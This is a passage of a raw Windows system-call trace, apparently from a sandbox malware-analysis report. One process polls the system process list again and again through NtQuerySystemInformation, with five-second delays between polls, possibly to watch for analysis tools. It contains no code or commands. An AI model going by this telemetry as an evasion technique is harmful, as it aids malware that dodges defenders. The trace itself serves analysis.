RegionSize=0xdea54*=0x20000) returned 0x0 [0237.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.352] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.413] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.434] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.480] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.483] 